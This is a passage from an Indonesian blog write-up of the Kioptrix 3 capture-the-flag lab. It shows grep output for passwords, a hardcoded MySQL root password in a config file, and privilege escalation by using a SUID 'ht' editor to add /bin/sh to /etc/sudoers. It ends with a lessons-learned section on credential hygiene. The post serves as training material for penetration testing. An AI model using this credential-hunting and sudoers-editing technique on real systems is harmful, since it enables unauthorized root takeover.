/usr/share/phpmyadmin/server_privileges.php:681:       . $spaces . '<label for="button_generate_password">' . "\n"
/usr/share/phpmyadmin/server_privileges.php:685:       . $spaces . '    <input type="button" id="button_generate_password" value="' . $GLOBALS['strGenerate'] . '" onclick="suggestPassword()" />' . "\n"
/usr/share/phpmyadmin/server_privileges.php:686:       . $spaces . '    <input type="button" id="button_copy_password" value="' . $GLOBALS['strCopy'] . '" onclick="suggestPasswordCopy(this.form)" />' . "\n"
/usr/share/phpmyadmin/server_privileges.php:712:        // uses $password
/usr/share/phpmyadmin/server_privileges.php:713:        if (!isset($password) && isset($Password)) {
/usr/share/phpmyadmin/server_privileges.php:714:            $password=$Password;
/usr/share/phpmyadmin/server_privileges.php:773:        if ($pred_password != 'none' && $pred_password != 'keep') {
/usr/share/phpmyadmin/server_privileges.php:782:            if ($pred_password == 'keep' && !empty($password)) {
/usr/share/phpmyadmin/server_privileges.php:783:                $real_sql_query .= ' IDENTIFIED BY PASSWORD \'' . $password . '\'';
/usr/share/phpmyadmin/server_privileges.php:785:                    $create_user_real .= ' IDENTIFIED BY PASSWORD \'' . $password . '\'';
/usr/share/phpmyadmin/server_privileges.php:866:            // we put the query containing the hidden password in
/usr/share/phpmyadmin/server_privileges.php:1093: * Updates the password
/usr/share/phpmyadmin/server_privileges.php:1096:    // similar logic in user_password.php
/usr/share/phpmyadmin/server_privileges.php:1114:        // in $sql_query which will be displayed, hide the password
/usr/share/phpmyadmin/server_privileges.php:1220:        // when there is a query containing a hidden password, take it
/usr/share/phpmyadmin/server_privileges.php:1921:            require_once './libraries/display_change_password.lib.php';
/usr/share/phpmyadmin/config.sample.inc.php:14: * This is needed for cookie based authentication to encrypt password in
/usr/share/phpmyadmin/scripts/setup.php:708: *                  'password' means password input.
/usr/share/phpmyadmin/scripts/setup.php:735:            } elseif ($val[3] == 'password') {
/usr/share/phpmyadmin/scripts/setup.php:736:                $type = 'password';
/usr/share/phpmyadmin/scripts/setup.php:741:            case 'password':
/usr/share/phpmyadmin/scripts/setup.php:827:            array('Show password change form', 'ShowChgPassword', 'Whether to show form for changing password, this does not limit ability to execute the same command directly', FALSE),
/usr/share/phpmyadmin/scripts/setup.php:1007:            array('Password for config auth', 'password', 'Leave empty if not using config auth', 'password'),
/usr/share/phpmyadmin/scripts/setup.php:1011:            array('phpMyAdmin control user password', 'controlpass', 'Password for user which phpMyAdmin can use for various actions', 'password'),
/usr/share/phpmyadmin/scripts/setup.php:1351:            $new_server = grab_values('host;extension;port;socket;connect_type;compress:bool;controluser;controlpass;auth_type;user;password;only_db;verbose;pmadb;bookmarktable:serialized;relation:serialized;table_info:serialized;table_coords:serialized;pdf_pages:serialized;column_info:serialized;designer_coords:serialized;history:serialized;AllowDeny:serialized;SignonSession;SignonURL;LogoutURL');
/usr/share/phpmyadmin/scripts/setup.php:1388:                    message('error', 'Empty phpMyAdmin control user password while using pmadb!');
/usr/share/phpmyadmin/scripts/setup.php:1423:                unset($new_server['password']);
/usr/share/phpmyadmin/scripts/setup.php:1964:            message('warning', 'You are not using secure connection, all data (including sensitive, like passwords) are transfered unencrypted!' . $redir, 'Not secure connection');
/usr/share/phpmyadmin/phpmyadmin.css.php:611:li#li_change_password {
/usr/share/phpmyadmin/lang/italian-utf-8.inc.php:28:$strAccessDeniedExplanation = 'phpMyAdmin ha provato a connettersi al server MySQL, e il server ha rifiutato la connessione. Si dovrebbe controllare il nome dell\'host, l\'username e la password nel file config.inc.php ed assicurarsi che corrispondano alle informazioni fornite dall\'amministratore del server MySQL.';
/usr/share/phpmyadmin/lang/italian-utf-8.inc.php:131:$strChangePassword = 'Cambia password';
/usr/share/phpmyadmin/lang/italian-utf-8.inc.php:380:$strInsecureMySQL = 'Il file di configurazione in uso contiene impostazioni (root con nessuna password) che corrispondono ai privilegi dell\'account MySQL predefinito. Un server MySQL funzionante con queste impostazioni è aperto a intrusioni, e si dovrebbe realmente riparare a questa falla nella sicurezza.';
/usr/share/phpmyadmin/lang/italian-utf-8.inc.php:410:$strKeepPass = 'Non cambiare la password';
/usr/share/phpmyadmin/lang/italian-utf-8.inc.php:549:$strPasswordChanged = 'La password per l\'utente %s è cambiata con successo.';
/usr/share/phpmyadmin/lang/italian-utf-8.inc.php:550:$strPasswordEmpty = 'La password è vuota!';
/usr/share/phpmyadmin/lang/italian-utf-8.inc.php:552:$strPasswordNotSame = 'La password non coincide!';
/usr/share/phpmyadmin/lang/italian-utf-8.inc.php:704:$strSecretRequired = 'Adesso c\'è bisogno di una password per il file di configurazione (blowfish_secret).';
/usr/share/phpmyadmin/lang/italian-utf-8.inc.php:1021:$strWrongUser = 'Nome utente o password errati. Accesso negato.';
/usr/share/phpmyadmin/lang/norwegian-utf-8.inc.php:26:$strAccessDeniedExplanation = 'phpMyAdmin forsøkte å koble til MySQL-serveren, og serveren avviste tilkoblingen. Du må kontrollere vert (host), brukernavn (username) og passord (password) i config.inc.php og sjekke at de tilsvarer den informasjonen du fikk fra MySQL-server administratoren.';
/usr/share/phpmyadmin/lang/persian-utf-8.inc.php:350:$strAccessDeniedExplanation = 'phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in your configuration and make sure that they correspond to the information given by the administrator of the MySQL server.'; //to translate
/usr/share/phpmyadmin/lang/thai-utf-8.inc.php:600:$strAccessDeniedExplanation = 'phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in your configuration and make sure that they correspond to the information given by the administrator of the MySQL server.';  //to translate
/usr/share/phpmyadmin/lang/hindi-utf-8.inc.php:272:$strAccessDeniedExplanation = 'phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in your configuration and make sure that they correspond to the information given by the administrator of the MySQL server.';  //to translate
/usr/share/phpmyadmin/lang/hindi-utf-8.inc.php:483:$strInsecureMySQL = 'Your configuration file contains settings (root with no password) that correspond to the default MySQL privileged account. Your MySQL server is running with this default, is open to intrusion, and you really should fix this security hole.';  //to translate
/usr/share/phpmyadmin/lang/hindi-utf-8.inc.php:608:$strPasswordEmpty = 'The password is empty!'; //to translate
/usr/share/phpmyadmin/lang/hindi-utf-8.inc.php:610:$strPasswordNotSame = 'The passwords aren\'t the same!'; //to translate
/usr/share/phpmyadmin/lang/albanian-utf-8.inc.php:271:$strInsecureMySQL = 'File i konfigurimit në përdorim përmban zgjedhje (root pa asnjë password) që korrispondojnë me të drejtat e account MySQL të paracaktuar. Një server MySQL funksionues me këto zgjedhje është i pambrojtur ndaj sulmeve, dhe ju duhet patjetër të korrigjoni këtë vrimë në siguri.';
/usr/share/phpmyadmin/lang/georgian-utf-8.inc.php:360:$strAccessDeniedExplanation = 'phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in your configuration and make sure that they correspond to the information given by the administrator of the MySQL server.';  //to translate
/usr/share/phpmyadmin/lang/georgian-utf-8.inc.php:552:$strInsecureMySQL = 'Your configuration file contains settings (root with no password) that correspond to the default MySQL privileged account. Your MySQL server is running with this default, is open to intrusion, and you really should fix this security hole.';  //to translate
/usr/share/phpmyadmin/lang/english-utf-8.inc.php:28:$strAccessDeniedExplanation = 'phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in your configuration and make sure that they correspond to the information given by the administrator of the MySQL server.';
/usr/share/phpmyadmin/lang/english-utf-8.inc.php:131:$strChangePassword = 'Change password';
/usr/share/phpmyadmin/lang/english-utf-8.inc.php:380:$strInsecureMySQL = 'Your configuration file contains settings (root with no password) that correspond to the default MySQL privileged account. Your MySQL server is running with this default, is open to intrusion, and you really should fix this security hole.';
/usr/share/phpmyadmin/lang/english-utf-8.inc.php:410:$strKeepPass = 'Do not change the password';
/usr/share/phpmyadmin/lang/english-utf-8.inc.php:549:$strPasswordChanged = 'The password for %s was changed successfully.';
/usr/share/phpmyadmin/lang/english-utf-8.inc.php:550:$strPasswordEmpty = 'The password is empty!';
/usr/share/phpmyadmin/lang/english-utf-8.inc.php:552:$strPasswordNotSame = 'The passwords aren\'t the same!';
/usr/share/phpmyadmin/lang/english-utf-8.inc.php:1021:$strWrongUser = 'Wrong username/password. Access denied.';
/usr/share/phpmyadmin/lang/azerbaijani-utf-8.inc.php:603:$strAccessDeniedExplanation = 'phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in your configuration and make sure that they correspond to the information given by the administrator of the MySQL server.';  //to translate
/usr/share/phpmyadmin/lang/afrikaans-utf-8.inc.php:385:$strAccessDeniedExplanation = 'phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in your configuration and make sure that they correspond to the information given by the administrator of the MySQL server.';  //to translate
/usr/share/phpmyadmin/lang/afrikaans-utf-8.inc.php:563:$strInsecureMySQL = 'Your configuration file contains settings (root with no password) that correspond to the default MySQL privileged account. Your MySQL server is running with this default, is open to intrusion, and you really should fix this security hole.';  //to translate
/usr/share/phpmyadmin/lang/ukrainian-utf-8.inc.php:22:$strAccessDeniedExplanation = 'phpMyAdmin спробував з\'єднатися з MySQL сервером, але сервер не дозволив під\'єднання. Прошу перевірити значення host, username та password у файлі config.inc.php та впевнитися, що вони відповідають даним отриманим Вами від адміністратора MySQL сервера.';
/usr/share/phpmyadmin/lang/korean-utf-8.inc.php:442:$strAccessDeniedExplanation = 'phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in your configuration and make sure that they correspond to the information given by the administrator of the MySQL server.';  //to translate
/usr/share/phpmyadmin/lang/sinhala-utf-8.inc.php:30:$strAccessDeniedExplanation = 'phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in your configuration and make sure that they correspond to the information given by the administrator of the MySQL server.';
/usr/share/phpmyadmin/lang/sinhala-utf-8.inc.php:354:$strInsecureMySQL = 'Your configuration file contains settings (root with no password) that correspond to the default MySQL privileged account. Your MySQL server is running with this default, is open to intrusion, and you really should fix this security hole.';
/usr/share/phpmyadmin/lang/sinhala-utf-8.inc.php:517:$strPasswordChanged = 'The password for %s was changed successfully.';
/usr/share/phpmyadmin/lang/sinhala-utf-8.inc.php:518:$strPasswordEmpty = 'The password is empty!';
/usr/share/phpmyadmin/lang/sinhala-utf-8.inc.php:520:$strPasswordNotSame = 'The passwords aren\'t the same!';
/usr/share/phpmyadmin/lang/malay-utf-8.inc.php:440:$strAccessDeniedExplanation = 'phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in your configuration and make sure that they correspond to the information given by the administrator of the MySQL server.';  //to translate
/usr/share/phpmyadmin/lang/french-utf-8.inc.php:25:$strAccessDeniedExplanation = 'phpMyAdmin a tenté de se connecter au serveur MySQL, et le serveur a rejeté la connexion. Veuillez vérifier les valeurs de "host", "username" et "password" dans votre configuration et vous assurer qu\'elles correspondent aux informations fournies par l\'administrateur du serveur MySQL.';
/usr/share/phpmyadmin/main.php:44:    // password if the configuration permits
/usr/share/phpmyadmin/main.php:203:     * Change password
/usr/share/phpmyadmin/main.php:208:        PMA_printListItem($strChangePassword, 'li_change_password',
/usr/share/phpmyadmin/main.php:209:            './user_password.php?' . $common_url_query);
/usr/share/phpmyadmin/main.php:343: && $cfg['Server']['password'] == '') {
/etc/phpmyadmin/config.inc.php:10: * NOTE: do not add security sensitive data to this file (like passwords)
/home/www/kioptrix3.com/gallery/gfunctions.php:11:                                    $GLOBALS["gallarific_mysql_password"])
/home/www/kioptrix3.com/gallery/gfunctions.php:583:        $password = escape($_POST["password"]);
/home/www/kioptrix3.com/gallery/gfunctions.php:679:            $query = sprintf("insert into gallarific_users(username, password, usertype, firstname, lastname, email, datejoined, website, issuperuser, photo, joincode) values('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s')", $username, $password, "normaluser", $firstname, $lastname, $email, time(), $website, 0, $photo_file, $join_code);
/home/www/kioptrix3.com/gallery/gfunctions.php:771:        if(isset($_POST["gusername"]) && isset($_POST["gpassword"])) {
/home/www/kioptrix3.com/gallery/gfunctions.php:773:            $password = escape($_POST["gpassword"]);
/home/www/kioptrix3.com/gallery/gfunctions.php:774:            $query = sprintf("select * from gallarific_users where username='%s' and password='%s'", $username, $password);
/home/www/kioptrix3.com/gallery/gfunctions.php:794:                $error = "Your username or password is incorrect. Please login again.";
/home/www/kioptrix3.com/gallery/gfunctions.php:799:            $error = "Your username or password is incorrect. Please login again.";
/home/www/kioptrix3.com/gallery/gfunctions.php:857:        $password = escape($_POST["password"]);
/home/www/kioptrix3.com/gallery/gfunctions.php:946:            $query = sprintf("update gallarific_users set password='%s', firstname='%s', lastname='%s', email='%s', website='%s' where userid='%d'", $password, $firstname, $lastname, $email, $website, $user_id);
/home/www/kioptrix3.com/gallery/gfunctions.php:948:            $query = sprintf("update gallarific_users set password='%s', firstname='%s', lastname='%s', email='%s', website='%s', photo='%s' where userid='%d'", $password, $firstname, $lastname, $email, $website, $photo_file, $user_id);
/home/www/kioptrix3.com/gallery/gconfig.php:20:	$GLOBALS["gallarific_mysql_password"] = "fuckeyou";
/home/www/kioptrix3.com/gallery/gconfig.php:24:if(!$g_mysql_c = @mysql_connect($GLOBALS["gallarific_mysql_server"], $GLOBALS["gallarific_mysql_username"], $GLOBALS["gallarific_mysql_password"])) {
loneferret@Kioptrix3:~$ 
loneferret@Kioptrix3:~$ 

Berdasarkan hasil pencarian dengan kata password pada file berekstensi *.php, ditemukan adanya password fuckeyou pada file gconfig.php dengan file path /home/www/kioptrix3.com/gallery/. Setelah ditelusuri lebih lanjut ternyata password fuckeyou adalah milik dari root untuk MySQL (lihat barus 52 dan 53). Bukan credential root milik Sistem Operasi, apabila kita gunakan untuk login menggunakan password tersebut pada account root maka akan muncul pesan “Authentication failure”.

loneferret@Kioptrix3:~$ cd /home/www/kioptrix3.com/gallery/
loneferret@Kioptrix3:/home/www/kioptrix3.com/gallery$ ls -l
total 156
drwxr-xr-x 2 root root  4096 2011-04-12 16:24 BACK
-rw-r--r-- 1 root root  3573 2009-10-10 15:43 db.sql
drwxr-xr-x 3 root root  4096 2011-04-12 13:14 gadmin
-rw-r--r-- 1 root root   214 2011-04-12 15:15 gallery.php
-rw-r--r-- 1 root root  1440 2011-04-14 11:32 gconfig.php
-rw-r--r-- 1 root root   297 2011-04-12 19:26 gfooter.php
-rw-r--r-- 1 root root 38771 2011-04-12 15:19 gfunctions.php
-rw-r--r-- 1 root root  1009 2011-04-12 15:11 gheader.php
-rw-r--r-- 1 root root   252 2011-04-12 15:10 g.php
-rw-r--r-- 1 root root   249 2011-04-12 15:03 index.php
-rw-r--r-- 1 root root 10340 2011-04-12 15:21 install.BAK
-rw-r--r-- 1 root root   212 2011-04-12 16:24 login.php
-rw-r--r-- 1 root root   213 2011-04-12 15:13 logout.php
drwxrwxrwx 2 root root  4096 2011-04-12 21:21 photos
-rw-r--r-- 1 root root   213 2011-04-12 15:20 photos.php
-rw-r--r-- 1 root root   219 2011-04-12 15:16 post_comment.php
-rw-r--r-- 1 root root   249 2011-04-12 15:14 p.php
-rw-r--r-- 1 root root   214 2011-04-12 15:58 profile.php
-rw-r--r-- 1 root root    87 2009-10-10 15:44 readme.html
-rw-r--r-- 1 root root   213 2011-04-12 15:17 recent.php
-rw-r--r-- 1 root root   215 2011-04-12 16:21 register.php
drwxr-xr-x 2 root root  4096 2011-04-13 04:24 scopbin
-rw-r--r-- 1 root root   213 2011-04-12 16:23 search.php
-rw-r--r-- 1 root root   216 2011-04-12 15:22 slideshow.php
-rw-r--r-- 1 root root   211 2011-04-12 15:18 tags.php
drwxr-xr-x 6 root root  4096 2011-04-12 13:14 themes
-rw-r--r-- 1 root root    56 2009-10-10 16:23 version.txt
-rw-r--r-- 1 root root   211 2011-04-12 15:23 vote.php
loneferret@Kioptrix3:/home/www/kioptrix3.com/gallery$ 
loneferret@Kioptrix3:/home/www/kioptrix3.com/gallery$ cat gconfig.php 
<?php
	error_reporting(0);
	/*
		A sample Gallarific configuration file. You should edit
		the installer details below and save this file as gconfig.php
		Do not modify anything else if you don't know what it is.
	*/

	// Installer Details -----------------------------------------------

	// Enter the full HTTP path to your Gallarific folder below,
	// such as http://www.yoursite.com/gallery
	// Do NOT include a trailing forward slash

	$GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";

	$GLOBALS["gallarific_mysql_server"] = "localhost";
	$GLOBALS["gallarific_mysql_database"] = "gallery";
	$GLOBALS["gallarific_mysql_username"] = "root";
	$GLOBALS["gallarific_mysql_password"] = "fuckeyou";

	// Setting Details -------------------------------------------------

if(!$g_mysql_c = @mysql_connect($GLOBALS["gallarific_mysql_server"], $GLOBALS["gallarific_mysql_username"], $GLOBALS["gallarific_mysql_password"])) {
		echo("A connection to the database couldn't be established: " . mysql_error());
		die();
}else {
	if(!$g_mysql_d = @mysql_select_db($GLOBALS["gallarific_mysql_database"], $g_mysql_c)) {
		echo("The Gallarific database couldn't be opened: " . mysql_error());
		die();
	}else {
		$settings=mysql_query("select * from gallarific_settings");
		if(mysql_num_rows($settings)!=0){
			while($data=mysql_fetch_array($settings)){
				$GLOBALS["{$data['settings_name']}"]=$data['settings_value'];
			}
		}
	
	}
}

?>
loneferret@Kioptrix3:/home/www/kioptrix3.com/gallery$ 
loneferret@Kioptrix3:/home/www/kioptrix3.com/gallery$ 
loneferret@Kioptrix3:~$ id
uid=1000(loneferret) gid=100(users) groups=100(users)
loneferret@Kioptrix3:~$ 
loneferret@Kioptrix3:~$ su root
Password: 
su: Authentication failure
loneferret@Kioptrix3:~$ 
loneferret@Kioptrix3:~$ 


Setelah melakukan penelusuran lebih lanjut. Kita menemukan beberapa hal menarik pada home folder milik user loneferret, yaitu adanya file bernama CompanyPolicy.Readme. Di dalam file tersebut disebutkan bahwa Lead Programmer (loneferret) harus menggunakan program bernama “ht” untuk membuat, melihat dan melakukan editing pada file. Apabila menggunakan program lain, maka akan ada sanksi manajemen. Perhatikan perhatikan eksekusi perintah berikut:

loneferret@Kioptrix3:~$ ls -l
total 32
-rwxrwxr-x 1 root root 26275 2011-01-12 10:45 checksec.sh
-rw-r--r-- 1 root root   224 2011-04-16 08:51 CompanyPolicy.README
loneferret@Kioptrix3:~$ 
loneferret@Kioptrix3:~$ 
loneferret@Kioptrix3:~$ cat CompanyPolicy.README 
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.

DG
CEO
loneferret@Kioptrix3:~$ 
loneferret@Kioptrix3:~$ sudo ht        
Error opening terminal: xterm-256color.
loneferret@Kioptrix3:~$ 


Apabila program “ht” dijalankan terlihat muncul error. Untuk melakukan troubleshooting, kita cukup menambahkan perintah export TERM=xterm dan selanjutnya dapat menjalankan program “ht”. Selanjutnya setelah diselidiki lebih jauh ternyata program “ht” memiliki SUID permission, artinya ia berjalan dengan hak akses root. Hal ini tentu merupakan peluang untuk meningkatkan hak akses menjadi root. Perhatikan permission dari program “ht” sebagai berikut:

loneferret@Kioptrix3:~$ 
loneferret@Kioptrix3:~$ find / -name ht 2>/dev/null
/usr/local/bin/ht
loneferret@Kioptrix3:~$ 
loneferret@Kioptrix3:~$ 
loneferret@Kioptrix3:~$ ls -l /usr/local/ht
ls: cannot access /usr/local/ht: No such file or directory
loneferret@Kioptrix3:~$ 
loneferret@Kioptrix3:~$ ls -l /usr/local/bin/ht
-rwsr-sr-x 1 root root 2072344 2011-04-16 07:26 /usr/local/bin/ht
loneferret@Kioptrix3:~$ 
loneferret@Kioptrix3:~$ 

Maka langkah selanjutnya adalah kita akan menjalankan program “ht” dan menyunting file /etc/sudoers untuk memberikan hak akses root pada program /bin/sh. Setelah hal tersebut kita berhasil meningkatkan hak akses menjadi root, sebagaimana langkah-langkah pada gambar berikut ini:

Gambar 6. Membuka file sudoers dengan program “ht”
Gambar 7. Menyunting file sudoers dengan menambahkan /bin/sh
Gambar 8. Meningkatkan hak akses menjadi root pada server Kioptrix3

Tampak pada rangkaian gambar 6 hingga gambar 8 bahwa penyerang telah berhasil meningkatkan hak aksesnya menjadi root dan telah berhasil menguasai server Kioptrix3 secara keseluruhan.

Lesson Learned

Pelajaran penting dari kisah serial Kioptrix bagian ketiga ini adalah seorang penyerang “sangat lapar” dengan credential. Diawali dari melakukan serangan terhadap layanan SSH dengan brute force untuk mendapatkan credential milik loneferret. Selanjutnya berhasil mengambil alih credential milik root untuk menguasai server secara keseluruhan dengan memanipulasi hak akses SUID pada program “ht”.

Awal dari bencana ini adalah lemahnya password dari loneferret sebagai Lead Programmer yang baru direkrut. Selanjutnya, sebagai pimpinan programmer ia tidak melakukan best practice pada secure coding, dimana ia melakukan menuliskan password bagi administrator MySQL.

Tentunya hal ini merupakan pelajaran penting bagi Penyelenggara SIstem Elektronik agar senantiasa melindungi credential milik sistemnya. Tidak hanya administrator saja yang dilindungi namun seluruh user secara keseluruhan. Karena penyerang akan bergerak secara horizontal sebelum akhirnya merebut credential milik root.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s